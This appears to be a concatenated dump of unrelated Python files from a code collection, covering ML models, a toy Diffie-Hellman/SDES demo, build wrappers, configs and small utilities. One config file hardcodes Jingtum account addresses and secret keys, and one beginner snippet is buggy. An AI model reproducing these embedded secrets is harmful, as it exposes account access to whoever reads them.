                yield self.fix_one_batch(batch)
                batch = {'src_ids': [], 'trg_ids': []}
        if(len(batch['src_ids'])):
            # pbar.update(1)
            yield self.fix_one_batch(batch)
    def save_model(self, pickle_datapath):
        """Pickle the vocabulary/token state needed to re-create this handler."""
        data_handler_data = {
            'stoi' : self.stoi,
            'vocab' : self.vocab,
            'data_path' : self.data_path,
            'unk_token' : self.unk_token,
            'pad_token' : self.pad_token
        }
        pickle.dump(data_handler_data, open(pickle_datapath, 'wb'))
        print('Saved data handling model!')
    def load_model(self, pickle_datapath):
        """Restore vocabulary/token state previously written by save_model."""
        data_handler_data = pickle.load(open(pickle_datapath, 'rb'))
        self.stoi = data_handler_data['stoi']
        self.itos = dict((v, k) for k,v in self.stoi.items())
        self.data_path = data_handler_data['data_path']
        self.unk_token = data_handler_data['unk_token']
        self.pad_token = data_handler_data['pad_token']
        self.vocab = data_handler_data['vocab']
        self.vocab_size = len(self.vocab)
        self.unk_index = self.stoi[self.unk_token]
        self.pad_index = self.stoi[self.pad_token]
        print('Loaded data handling model!')
    def encode_one(self, text):
        """Clean *text* and return its token ids as a (1, seq_len) array."""
        return np.array([
            [
                self.stoi[token] if token in self.stoi else self.stoi['<UNK>']
                for token in bioclean(text).split()
            ]
        ])
|
18,722 | 78d86c92091530fae68c9b27f6b2e0a500307a1d | import socket
# Minimal TCP client demo: connect to a fixed LAN host/port.
phone=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
phone.connect(('192.168.0.101',8000))
# Interactive send/receive loop, kept commented out for reference
# (prompts translated from Chinese):
# while True:
#     a=input("Enter a name: ")
#     if not a:continue
#     if a=='quit':break
#     phone.send(a.encode("utf-8"))
#     data=phone.recv(1024)
#     print('Message received by server:',data.decode("gbk"))
# phone.close()
18,723 | ff7d78509fc9845899e23da5a762d10e72a06cbb | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-01 19:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: store ``propiedad.img`` as raw bytes."""
    dependencies = [
        ('api', '0002_propiedad_img'),
    ]
    operations = [
        migrations.AlterField(
            model_name='propiedad',
            name='img',
            field=models.BinaryField(),
        ),
    ]
|
18,724 | 9ac85017c774bf12c02f51a733012c75b8219869 | # You can also nest for loops with
# while loops. Check it out!
for i in range(4):
    print("For loop: " + str(i))
    # Count back down from i to 0 on every outer iteration.
    for x in range(i, -1, -1):
        print("    While loop: " + str(x))
|
18,725 | 63806dc426c8b9a55a498ed637294555a3360a34 | from SDES import SDES, frombits
# Creates the public key, which is the first part of diffie-hellman key exchange
def publicKey(privateKey, g, prime):
    """Return the Diffie-Hellman public key ``g^privateKey mod prime``.

    Uses three-argument pow() for modular exponentiation, which avoids
    materialising the (potentially enormous) intermediate ``g**privateKey``.
    """
    return pow(g, privateKey, prime)
# Uses the public key to the other part and your private key to create the shared key
# The shared key is a secret key, which only Alice and Bob will know.
def sharedKey(publicKey, privateKey, prime):
    """Return the shared DH secret ``publicKey^privateKey mod prime``.

    Both parties compute the same value from the other side's public key;
    three-argument pow() keeps the exponentiation modular throughout.
    """
    return pow(publicKey, privateKey, prime)
# Blum blum shub implementation
def CSPRNG_BBS(seed, size):
    """Blum Blum Shub pseudo-random bit generator.

    Produces *size* bits as a '0'/'1' string by iterating
    ``seed = seed^2 mod M`` with M = p*q (p=7, q=11) and emitting the parity
    of each new state.

    Returns an error-message string (matching the original contract) when
    the current state drops below 2 or shares a factor with M.
    """
    p = 7
    q = 11
    M = p*q
    bits = ""
    for _ in range(size):
        # The state is re-validated every round: squaring mod M can reach a
        # degenerate state mid-stream.
        if seed < 2:
            return "The seed can't be 0 or 1"
        # O(1) replacement for the original O(seed) divisor scan (whose
        # `factorials` list was never used).
        if seed % p == 0 or seed % q == 0:
            return "p and q can not be factors of the seed"
        seed = (seed**2) % M
        bits += str(seed % 2)
    return bits
# Part 1
def main():
    """Interactive demo: Diffie-Hellman key exchange, BBS key strengthening,
    then SDES encryption/decryption of a message from Alice to Bob."""
    # the generator g is pre defined as 2
    g = 2
    # The shared prime is a Safe prime, decided by 2q+1, where q is a Sophie Germain prime
    sharedPrime = 719
    print("The shared prime is ", sharedPrime, '. Which gives us the cyclic group: Z*', sharedPrime)
    print("The generator (g) is ", g)
    # Alice and Bob's private keys which is secret.
    alicePrivate = 217
    bobPrivate = 131
    print("Alice's private key is ", alicePrivate)
    print("Bob's private key is ", bobPrivate)
    # Creates the public key which can be sent over to the other part.
    alicePublic = publicKey(alicePrivate, g, sharedPrime)
    bobPublic = publicKey(bobPrivate, g, sharedPrime)
    print("Alice's public key is ", alicePublic)
    print("Bob's public key is ", bobPublic)
    # Creates the shared secret key. Alice and Bob should have the same number
    # If they not have the same number they do not use the same prime and generator
    aliceShared = sharedKey(bobPublic, alicePrivate, sharedPrime)
    bobShared = sharedKey(alicePublic, bobPrivate, sharedPrime)
    if aliceShared == bobShared:
        print("Alice's shared key is ", aliceShared)
        print("Bob's shared key is ", bobShared)
    else:
        print("Something went wrong")
    # Uses the pseudo-random number generator Blum Blum Shub to strengthen the key
    # We choose how many bits long we want the key to be. In this case I chose 10
    secretKeyBit = CSPRNG_BBS(aliceShared, 10)
    secretKey = int(secretKeyBit, 2)
    print("Stronger secret key is ", secretKey)
    # You can either used my predefined message or write your own message to Bob
    yesOrNo = input("Do you want to send a predefined message? y/n: ")
    if yesOrNo == 'y' or yesOrNo == 'Y' or yesOrNo == 'yes':
        message = "This is a super secret message"
    else:
        message = input("Write your own message to Bob: ")
    print("Alices message is: ", message)
    # Converts the message into bits (one 8-bit string per character)
    messageBits = ' '.join(format(ord(x), 'b').zfill(8) for x in message).split(' ')
    encrypted = []
    # Encrypts the message, by using SDES from Assignment 1.
    # The key used in the encryption is the secret key we got from diffie-hellman and BBS.
    for i in range(0, len(message)):
        encrypted.append(SDES(messageBits[i], secretKeyBit))
    print("Encrypted text from Alice to Bob: ", encrypted)
    decrypted = ''
    # Decrypts the message using the same key
    for i in range (0, len(encrypted)):
        decrypted += frombits(SDES(encrypted[i], secretKeyBit, True))
    print("The message that Bob gets is: ", decrypted)
# Script entry point.
if __name__ == "__main__":
    main()
|
18,726 | f930f54971ed4839dc35927f832233b47cc7e5ab | """ Adapted from the original implementation. """
import collections
import dataclasses
from typing import List
import torch
@dataclasses.dataclass
class VoVNetParams:
    """Architecture hyper-parameters for one VoVNet variant."""
    stem_out: int  # Channel depth produced by the stem.
    stage_conv_ch: List[int]  # Channel depth of each OSA stage's conv layers.
    stage_out_ch: List[int]  # The channel depth of the concatenated output
    layer_per_block: int  # Conv layers inside each OSA block.
    block_per_stage: List[int]  # Number of OSA blocks in each stage.
    dw: bool  # Whether to use depthwise separable convolutions.
# Registry of the supported VoVNet variants, keyed by model name.  Tuple
# order matches VoVNetParams:
#   (stem_out, stage_conv_ch, stage_out_ch, layer_per_block, block_per_stage, dw)
_STAGE_SPECS = {
    "vovnet-19-slim-dw": VoVNetParams(
        64, [64, 80, 96, 112], [112, 256, 384, 512], 3, [1, 1, 1, 1], True
    ),
    "vovnet-19-dw": VoVNetParams(
        64, [128, 160, 192, 224], [256, 512, 768, 1024], 3, [1, 1, 1, 1], True
    ),
    "vovnet-19-slim": VoVNetParams(
        128, [64, 80, 96, 112], [112, 256, 384, 512], 3, [1, 1, 1, 1], False
    ),
    "vovnet-19": VoVNetParams(
        128, [128, 160, 192, 224], [256, 512, 768, 1024], 3, [1, 1, 1, 1], False
    ),
    "vovnet-39": VoVNetParams(
        128, [128, 160, 192, 224], [256, 512, 768, 1024], 5, [1, 1, 2, 2], False
    ),
    "vovnet-57": VoVNetParams(
        128, [128, 160, 192, 224], [256, 512, 768, 1024], 5, [1, 1, 4, 3], False
    ),
    "vovnet-99": VoVNetParams(
        128, [128, 160, 192, 224], [256, 512, 768, 1024], 5, [1, 3, 9, 3], False
    ),
}
# BatchNorm hyper-parameters shared by every conv block.
_BN_MOMENTUM = 1e-1
_BN_EPS = 1e-5
def dw_conv(
    in_channels: int, out_channels: int, stride: int = 1
) -> List[torch.nn.Module]:
    """ Depthwise separable pointwise linear convolution. """
    # 3x3 depthwise (one filter per input channel), then a 1x1 pointwise
    # projection, normalisation and activation.
    depthwise = torch.nn.Conv2d(
        in_channels,
        in_channels,
        kernel_size=3,
        padding=1,
        stride=stride,
        groups=in_channels,
        bias=False,
    )
    project = torch.nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=True)
    norm = torch.nn.BatchNorm2d(out_channels, eps=_BN_EPS, momentum=_BN_MOMENTUM)
    return [depthwise, project, norm, torch.nn.ReLU(inplace=True)]
def conv(
    in_channels: int,
    out_channels: int,
    stride: int = 1,
    groups: int = 1,
    kernel_size: int = 3,
    padding: int = 1,
) -> List[torch.nn.Module]:
    """ 3x3 convolution with padding."""
    convolution = torch.nn.Conv2d(
        in_channels,
        out_channels,
        kernel_size=kernel_size,
        stride=stride,
        padding=padding,
        groups=groups,
        bias=False,
    )
    norm = torch.nn.BatchNorm2d(out_channels, eps=_BN_EPS, momentum=_BN_MOMENTUM)
    activation = torch.nn.ReLU(inplace=True)
    return [convolution, norm, activation]
def pointwise(in_channels: int, out_channels: int) -> List[torch.nn.Module]:
    """ Pointwise convolution."""
    layers = [torch.nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=True)]
    layers.append(torch.nn.BatchNorm2d(out_channels, eps=_BN_EPS, momentum=_BN_MOMENTUM))
    layers.append(torch.nn.ReLU(inplace=True))
    return layers
class ESE(torch.nn.Module):
    """Effective Squeeze-Excitation: channel attention without the channel
    bottleneck used by the original SE block, so no information is squeezed
    away."""

    def __init__(self, channel: int) -> None:
        super().__init__()
        self.avg_pool = torch.nn.AdaptiveAvgPool2d(1)
        self.fc = torch.nn.Conv2d(channel, channel, kernel_size=1)  # (Linear)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        # Global average pool -> per-channel gate in (0, 1) -> rescale input.
        attention = self.avg_pool(x)
        attention = self.fc(attention)
        return torch.sigmoid(attention) * x
class OSA(torch.nn.Module):
    def __init__(
        self,
        in_channels: int,
        stage_channels: int,
        concat_channels: int,
        layer_per_block: int,
        use_depthwise: bool = False,
    ) -> None:
        """ Implementation of an OSA layer which takes the output of its conv layers and
        concatenates them into one large tensor which is passed to the next layer. The
        goal with this concatenation is to preserve information flow through the model
        layers. This also ends up helping with small object detection.
        Args:
            in_channels: Channel depth of the input to the OSA block.
            stage_channels: Channel depth to reduce the input.
            concat_channels: Channel depth to force on the concatenated output of the
                comprising layers in a block.
            layer_per_block: The number of layers in this OSA block.
            use_depthwise: Wether to use depthwise separable pointwise linear convs.
        """
        super().__init__()
        # Keep track of the size of the final concatenation tensor.
        aggregated = in_channels
        self.isReduced = in_channels != stage_channels
        # If this OSA block is not the first in the OSA stage, we can
        # leverage the fact that subsequent OSA blocks have the same input and
        # output channel depth, concat_channels. This lets us reuse the concept of
        # a residual from ResNet models.
        self.identity = in_channels == concat_channels
        self.layers = torch.nn.ModuleList()
        self.use_depthwise = use_depthwise
        conv_op = dw_conv if use_depthwise else conv
        # If this model uses depthwise and the input channel depth needs to be reduced
        # to the stage_channels size, add a pointwise layer to adjust the depth. If the
        # model is not depthwise, let the first OSA layer do the resizing.
        if self.use_depthwise and self.isReduced:
            self.conv_reduction = torch.nn.Sequential(
                *pointwise(in_channels, stage_channels)
            )
            in_channels = stage_channels
        for _ in range(layer_per_block):
            self.layers.append(
                torch.nn.Sequential(*conv_op(in_channels, stage_channels))
            )
            in_channels = stage_channels
        # feature aggregation: the input plus every intermediate layer output.
        aggregated += layer_per_block * stage_channels
        self.concat = torch.nn.Sequential(*pointwise(aggregated, concat_channels))
        self.ese = ESE(concat_channels)
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        if self.identity:
            identity_feat = x
        output = [x]
        if self.use_depthwise and self.isReduced:
            x = self.conv_reduction(x)
        # Loop through all the conv layers, keeping every intermediate output
        # for the final concatenation.
        for layer in self.layers:
            x = layer(x)
            output.append(x)
        x = torch.cat(output, dim=1)
        xt = self.concat(x)
        xt = self.ese(xt)
        if self.identity:
            xt += identity_feat
        return xt
class OSA_stage(torch.nn.Sequential):
    def __init__(
        self,
        in_channels: int,
        stage_channels: int,
        concat_channels: int,
        block_per_stage: int,
        layer_per_block: int,
        stage_num: int,
        use_depthwise: bool = False,
    ) -> None:
        """An OSA stage which is comprised of OSA blocks.
        Args:
            in_channels: Channel depth of the input to the OSA stage.
            stage_channels: Channel depth to reduce the input of the block to.
            concat_channels: Channel depth to force on the concatenated output of the
                comprising layers in a block.
            block_per_stage: Number of OSA blocks in this stage.
            layer_per_block: The number of layers per OSA block.
            stage_num: The OSA stage index.
            use_depthwise: Wether to use depthwise separable pointwise linear convs.
        """
        super().__init__()
        # Use maxpool to downsample the input to this OSA stage.
        self.add_module(
            "Pooling", torch.nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        )
        for idx in range(block_per_stage):
            # Add the OSA modules. If this is the first block in the stage, use the
            # proper in channels; the rest of the OSA blocks take
            # the concatenation channel depth outputted from the previous block.
            self.add_module(
                f"OSA{stage_num}_{idx + 1}",
                OSA(
                    in_channels if idx == 0 else concat_channels,
                    stage_channels,
                    concat_channels,
                    layer_per_block,
                    use_depthwise=use_depthwise,
                ),
            )
class VoVNet(torch.nn.Sequential):
    def __init__(
        self, model_name: str, num_classes: int = 10, input_channels: int = 3
    ) -> None:
        """
        Args:
            model_name: Which model to create.
            num_classes: The number of classification classes.
            input_channels: The number of input channels.
        Usage:
        >>> net = VoVNet("vovnet-19-slim-dw", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        >>> net = VoVNet("vovnet-19-dw", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        >>> net = VoVNet("vovnet-19-slim", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        >>> net = VoVNet("vovnet-19", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        >>> net = VoVNet("vovnet-39", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        >>> net = VoVNet("vovnet-57", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        >>> net = VoVNet("vovnet-99", num_classes=1000)
        >>> with torch.no_grad():
        ...    out = net(torch.randn(1, 3, 512, 512))
        >>> print(out.shape)
        torch.Size([1, 1000])
        """
        super().__init__()
        assert model_name in _STAGE_SPECS, f"{model_name} not supported."
        stem_ch = _STAGE_SPECS[model_name].stem_out
        config_stage_ch = _STAGE_SPECS[model_name].stage_conv_ch
        config_concat_ch = _STAGE_SPECS[model_name].stage_out_ch
        block_per_stage = _STAGE_SPECS[model_name].block_per_stage
        layer_per_block = _STAGE_SPECS[model_name].layer_per_block
        conv_type = dw_conv if _STAGE_SPECS[model_name].dw else conv
        # Construct the stem.
        stem = conv(input_channels, 64, stride=2)
        stem += conv_type(64, 64)
        # The original implementation uses a stride=2 on the conv below, but in this
        # implementation we'll just pool at every OSA stage, unlike the original
        # which doesn't pool at the first OSA stage.
        stem += conv_type(64, stem_ch)
        self.model = torch.nn.Sequential()
        self.model.add_module("stem", torch.nn.Sequential(*stem))
        self._out_feature_channels = [stem_ch]
        # Organize the outputs of each OSA stage. This is the concatentated channel
        # depth of each sub block's layer's outputs.
        in_ch_list = [stem_ch] + config_concat_ch[:-1]
        # Add the OSA modules. Typically 4 modules.
        for idx in range(len(config_stage_ch)):
            self.model.add_module(
                f"OSA_{(idx + 2)}",
                OSA_stage(
                    in_ch_list[idx],
                    config_stage_ch[idx],
                    config_concat_ch[idx],
                    block_per_stage[idx],
                    layer_per_block,
                    idx + 2,
                    _STAGE_SPECS[model_name].dw,
                ),
            )
            self._out_feature_channels.append(config_concat_ch[idx])
        # Add the classification head.
        self.model.add_module(
            "classifier",
            torch.nn.Sequential(
                # BUGFIX: BatchNorm2d's positional signature is
                # (num_features, eps, momentum); the original passed
                # (_BN_MOMENTUM, _BN_EPS) positionally, swapping the two.
                # Use keywords so eps/momentum match every other BN in the net.
                torch.nn.BatchNorm2d(
                    self._out_feature_channels[-1], eps=_BN_EPS, momentum=_BN_MOMENTUM
                ),
                torch.nn.AdaptiveAvgPool2d(1),
                torch.nn.Flatten(),
                torch.nn.Dropout(0.2),
                torch.nn.Linear(self._out_feature_channels[-1], num_classes, bias=True),
            ),
        )
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self.model(x)
    def forward_pyramids(self, x: torch.Tensor) -> collections.OrderedDict:
        """
        Args:
            model_name: Which model to create.
            num_classes: The number of classification classes.
            input_channels: The number of input channels.
        Usage:
        >>> net = VoVNet("vovnet-19-slim-dw", num_classes=1000)
        >>> net.delete_classification_head()
        >>> with torch.no_grad():
        ...    out = net.forward_pyramids(torch.randn(1, 3, 512, 512))
        >>> [level.shape[-1] for level in out.values()]  # Check the height/widths of levels
        [256, 128, 64, 32, 16]
        >>> [level.shape[1] for level in out.values()] == net._out_feature_channels
        True
        """
        levels = collections.OrderedDict()
        levels[1] = self.model.stem(x)
        levels[2] = self.model.OSA_2(levels[1])
        levels[3] = self.model.OSA_3(levels[2])
        levels[4] = self.model.OSA_4(levels[3])
        levels[5] = self.model.OSA_5(levels[4])
        return levels
    def delete_classification_head(self) -> None:
        """ Call this before using model as an object detection backbone. """
        del self.model.classifier
    def get_pyramid_channels(self) -> None:
        """ Return the number of channels for each pyramid level. """
        return self._out_feature_channels
|
18,727 | 1a6bbc20d6e81b803645b773b7e2f787e86400be | # write a python program to execute a string containing python code.
str="ankita"
var=""
b=[]
count=len(str)
while count>0:
var+=str[count+1]
count=count+1
print(var)
|
18,728 | 79eab321fae70465effdb41a05b4ec499ee6681e | import random as r
from pprint import pprint
import numpy as np
def tab_random_half(n, hashtab):
    """Build a random permutation of 1..n whose halves mirror via *hashtab*.

    Position i is drawn at random; position n-1-i is forced to hashtab[value]
    (expected to be the complement n+1-value), so each symmetric pair sums to
    n+1.  Returns an error message string for odd n.
    """
    if n % 2 == 1:
        return "Le nombre est impair"
    result = [0] * n
    remaining = [k for k in range(1, n + 1)]
    for i in range(n // 2):
        pick = remaining[r.randint(0, len(remaining) - 1)]
        result[i] = pick
        result[n - (i + 1)] = hashtab[pick]
        # Both the picked value and its mirror are now used up.
        remaining.remove(pick)
        remaining.remove(n - pick + 1)
    return result
def tab_random(n):
    """Return a random permutation of the integers 1..n."""
    result = [0] * n
    remaining = [k for k in range(1, n + 1)]
    for i in range(n):
        # Draw one still-unused value for each position.
        pick = remaining[r.randint(0, len(remaining) - 1)]
        result[i] = pick
        remaining.remove(pick)
    return result
def hash_tab(n):
    """Return {i: n+1-i for i in 1..n}: each value mapped to its complement."""
    return {i: (n + 1) - i for i in range(1, n + 1)}
18,729 | 74cb8c3110c49f0461e6d8dc5689e6bc195909d9 | """
Unit test for cloud experimentation framework
"""
from lib import test_base
from lib import traffic
# Absolute paths for the test configuration and the ping-result log.
# NOTE(review): user-specific absolute paths; consider making these
# configurable or relative to the repository root.
config_file_path = "/home/faiza/workspace/CEF/config/test_config.json"
log_file = "/home/faiza/workspace/CEF/results/output_log.txt"
#Test to ping vms in a mesh
class Test1(test_base.TestBase):
    """Full-mesh ping test: every instance pings every instance's private IP."""
    def __init__(self, config_file):
        # Explicit base-class call (rather than super()) keeps the original
        # delegation style used throughout this file.
        test_base.TestBase.__init__(self, config_file)
    def setup(self):
        # Delegates straight to the base setup (VPC/instance provisioning).
        test_base.TestBase.setup(self)
    def execute(self):
        # Collect every instance and every private IP across all VPCs, then
        # run the ping mesh and append results to log_file.
        src_vms = []
        dest_ips = []
        for vpc in self.vpc_list:
            for instance in vpc.aws_instances:
                src_vms.append(instance)
                dest_ips.append(instance.get_private_ip())
        traffic_test = traffic.Traffic()
        traffic_test.ping(src_vms, dest_ips, log_file)
    def cleanup(self):
        # Tear down whatever the base setup provisioned.
        test_base.TestBase.cleanup(self)
# Run the full test lifecycle when invoked as a script.
if __name__ == "__main__":
    test = Test1(config_file_path)
    test.setup()
    test.execute()
    test.cleanup()
|
18,730 | c841bb31ed3c1c10a796200d6d8866cf2ede1b3e | import os
class Config(object):
    """Flask application configuration."""
    PHOTO_BASE_URL = '/media/photos'
    CROP_BASE_URL = '/media/crops'
    ALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])
    #TODO - Get Secret Key working from environment variable. Might be an issue with OSX or Pycharm
    SECRET_KEY = os.environ.get('SECRET_KEY')
    #SECRET_KEY = 'ITsAS3cr3t!P4dding0utTHISBecauS31tS0uldB3loooonnnngggg'
    # BUGFIX: the original line ended with a comma, which made this attribute
    # a 1-tuple ('redis://localhost:6379',) instead of a string and broke
    # Celery's broker URL parsing.
    CELERY_BROKER_URL = 'redis://localhost:6379'
    CELERY_RESULT_BACKEND = 'redis://localhost:6379'
    DEBUG = False
18,731 | 93bab88b8d546b6fe2e33860ef123e0e08dafab7 | #!/usr/bin/python
"""
Copyright (c) 2013, Juniper Networks, Inc.
All rights reserved.
Author : Michael Ganley
manipulate paths to xml files.
"""
import argparse
from operator import index
import os
import sys
import shlex
import subprocess
import shutil
class manifestDir (object):
    """Extract branch/build-id/product/sku from a manifest file path and fire
    the matching Electric Commander procedure.  (Python 2 source.)

    Expected path layout, innermost first:
        <branch>/<buildid>/./<product>/<sku>/<manifest file>
    """
    def __init__(self, options):
        self.opt = options
    def parse (self):
        # Peel path components off the tail one os.path.split at a time.
        foo = os.path.split(self.opt.path_name)
        if DEBUG:
            print "manifest filename: ", foo[1]
        foo = os.path.split(foo[0])
        self.opt.sku = foo[1]
        if DEBUG:
            print "sku: ", self.opt.sku
        foo = os.path.split(foo[0])
        self.opt.product = foo[1]
        if DEBUG:
            print "product: ", self.opt.product
        """
        Because when the find runs it pass the '.'
        we have to skip over it.
        """
        foo = os.path.split(foo[0])
        foo = os.path.split(foo[0])
        self.opt.buildid=foo[1]
        if DEBUG:
            print "Build ID: ", self.opt.buildid
        foo = os.path.split(foo[0])
        self.opt.branch = foo[1]
        if DEBUG:
            print "Branch: ", self.opt.branch
    def fireProcedure (self):
        # In debug mode fire the harmless "Foo" procedure instead of the real
        # PipeLine, with the same parameters.
        if DEBUG:
            print "Going to execute procedure"
            command = "ectool runProcedure Contrail-CI-CD --procedureName Foo " \
                      "--actualParameter branch=" + self.opt.branch + \
                      " Platform=" + self.opt.product + \
                      " sku=" + self.opt.sku + \
                      " BuildId=" + self.opt.buildid
        else:
            command = "ectool runProcedure Contrail-CI-CD --procedureName PipeLine " \
                      "--actualParameter branch=" + self.opt.branch + \
                      " Platform=" + self.opt.product + \
                      " sku=" + self.opt.sku + \
                      " BuildId=" + self.opt.buildid
        if DEBUG:
            print "executing following command:\n", command
        execute(command, ignore_errors=False)
def execute(command, ignore_errors=False):
    """ Function to execute shell command and return the output """
    # (Python 2.)  Runs the tokenized command, merging stderr into stdout;
    # on failure exits the whole process unless ignore_errors is set.
    if DEBUG:
        print 'DEBUG: %s' % (command)
    pipe = subprocess.Popen(shlex.split(command),
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT,
                            close_fds=True)
    data = pipe.stdout.read()
    rc = pipe.wait()
    cwd = os.getcwd()
    if rc and not ignore_errors:
        print 'Error : Working directory : %s' % (cwd)
        print 'Error : Failed to execute command: %s\n%s' % (command, data)
        sys.exit(1)
    return data.strip()
def cmd_exists(cmd):
    """Return True when *cmd* resolves to a command/builtin in the shell."""
    status = subprocess.call(
        "type " + cmd,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    return status == 0
def parse_options(args):
    """ Parse command line arguments """
    parser = argparse.ArgumentParser(
        description='Contrail/EC procedure wrapper script ')
    parser.add_argument('-v', '--verbose', dest='debug', action='store_true',
                        help='Enable verbose mode')
    parser.add_argument('-p', '--path', dest='path_name',
                        help="Full path to the manifest file")
    subparsers = parser.add_subparsers(
        title='Fire off EC jobs based on the path to manifest file',
        description='Select one command',
        dest='command')
    # The 'parse' sub-command takes no options of its own; it only selects
    # the action to run.
    subparsers.add_parser('parse',
                          description='parse and execute build for manifest')
    return parser.parse_args(args)
# Script entry point: parse flags, then dispatch on the chosen sub-command.
if __name__ == '__main__':
    options = parse_options(sys.argv[1:])
    DEBUG = options.debug
    manifest = manifestDir(options)
    """ Test to make sure all our commands exist """
    if manifest.opt.command == 'parse':
        manifest.parse()
        manifest.fireProcedure()
        sys.exit(0)
    print "Unknown command: ", manifest.opt.command
    sys.exit(1)
18,732 | ce876416b48a9150165f4bc314b04725a9b111fe | # -*- coding:utf-8 -*-
# Jingtum API connection settings (alternate endpoints kept in trailing
# comments for reference).
server_host = "tapi.jingtum.com" #"101.200.230.74" #"123.57.209.177" #"101.200.174.147" #"kapi.jingtum.com"
sercer_port = 443 #8001 #80
is_https = True
web_socket_address = "wss://tapi.jingtum.com:5443" #"ws://101.200.230.74:5443" #"ws://123.57.209.177:5445" #"ws://101.200.174.147:5443"
#testaddress = "j3x4oo2KvexqjBoG7J9HXYjpFz8cLT31B9"
# Issuer / test account credentials.
# NOTE(review): secrets committed in source; rotate and move to environment
# variables or a secrets store.
issuer_account = "jHb9CJAWyB4jr91VRWn96DkukG4bwdtyTh"
issuer_secret = "snoPBjXtMeMyMHUVTgbuqAfg1SUTb"
issuer = "jBciDE8Q3uJjf111VeiUNM775AMKHEbBLS"
currency_ulimit_account = "jJ8PzpT7er3tXEWaUsVTPy3kQUaHVHdxvp"
currency_ulimit_secret = "shYK7gZVBzw4m71FFqZh9TWGXLR6Q"
|
class CsvTable:
    """Minimal CSV table: a header row plus data rows, loaded from a file."""

    def __init__(self, delim=","):
        self._data = []      # reserved / currently unused
        self._delim = delim  # field separator used by load()
        self._header = []    # column names (first row of the file)
        self._table = []     # data rows (lists of strings)

    def load(self, fname):
        """Read *fname*, split into header and data rows, and return self."""
        with open(fname) as fd:
            raw = [row.split(self._delim) for row in fd.read().splitlines()]
        self._header = raw[0]
        self._table = raw[1:]
        return self

    def header_count(self):
        """Number of columns."""
        return len(self._header)

    def header(self):
        """A copy of the header row."""
        return self._header.copy()

    def row(self, row_number, style='simple'):
        """Return a copy of data row *row_number* (0-based).

        Raises:
            IndexError: for out-of-range row numbers.  (BUGFIX: the original
            bound check used ``>`` so ``row(row_count)`` slipped past it and
            hit a raw list IndexError; fixed to ``>=``.)
        """
        if row_number < 0 or row_number >= self.row_count():
            raise IndexError(f"table has only {self.row_count()} rows")
        result = []
        if style == 'simple':
            result = self._table[row_number].copy()
        return result

    def row_count(self):
        """Number of data rows (header excluded)."""
        return len(self._table)

    def cell(self, row_number, column_name):
        """Return ``{column_name: value, "col_index": index}`` for one cell.

        Raises:
            IndexError: when the column does not exist.  (BUGFIX: list.index
            raises ValueError rather than returning -1, so the original
            ``col < 0`` branch was unreachable; translate the ValueError
            into the intended IndexError explicitly.)
        """
        row = self.row(row_number)
        try:
            col = self._header.index(column_name)
        except ValueError:
            raise IndexError(f"table has no {column_name} column") from None
        return {column_name: row[col], "col_index": col}

    def search(self, value, what='row_wise'):
        """Placeholder for a value search; not implemented yet."""
        if what == 'row_wise':
            pass
        elif what == 'col_wise':
            pass

    def dump(self):
        """Return the full table (header first) as a list of rows."""
        return [self._header] + self._table

    def __str__(self):
        return str(self.dump())
# Ad-hoc smoke test against a local sample file.
# NOTE(review): hard-coded Windows path; only runs on the author's machine.
if __name__ == "__main__":
    t = CsvTable()
    t.load(r"E:\Workspaces\Kurse\aktueller-kurs\Tag4\uebungen\bsp.csv")
    print(t.header())
    print(t.row(0))
    print(t.cell(0, "Ort"))
    print(t.header_count())
    print(t.row_count())
    print(t.dump())
    print(t)
|
18,734 | 4e621c8660e7a4f9b6784af962b040125534f741 | from attackcti import attack_client
def malware():
lift = attack_client()
all_enterprise = lift.get_enterprise_malware()
if len(all_enterprise) - 350 != 0:
print("There is a new MALWARE!")
created = all_enterprise[0]["created"]
name = all_enterprise[0]["name"]
description = all_enterprise[0]["description"]
print(f"Created: {created}\nName: {name}\nDescription: {description}")
|
18,735 | b1737a2fe9f8ec059417ce4471be79817537b92a | from render_timeline import parse_states, extract_msg_steps, extract_clients
tlc_output = r'''
State 5: <client line 65, col 20 to line 69, col 40 of module two_client_reliable_channel>
/\ C = [ ClientInboxes |->
[ client1 |->
<< [ rawMsg |->
[ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> "",
sendAt |-> 2,
payload |-> 1,
recvAt |-> -1 ] ],
[ rawMsg |->
[ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 2,
receiverState |-> "",
sendAt |-> 3,
payload |-> 1,
recvAt |-> -1 ] ] >>,
client2 |-> <<>> ],
LogicalTime |-> 4,
MsgSteps |->
{ [ receiver |-> "client2",
sender |-> "client1",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> 3,
sendAt |-> 1,
payload |-> "",
recvAt |-> 4 ] },
NextMsgId |-> 3 ]
/\ GlobalCount = [client1 |-> 1, client2 |-> 3]
/\ MsgsSent = [client1 |-> 1, client2 |-> 2]
State 6: <client line 65, col 20 to line 69, col 40 of module two_client_reliable_channel>
/\ C = [ ClientInboxes |->
[ client1 |->
<< [ rawMsg |->
[ receiver |-> "client1",
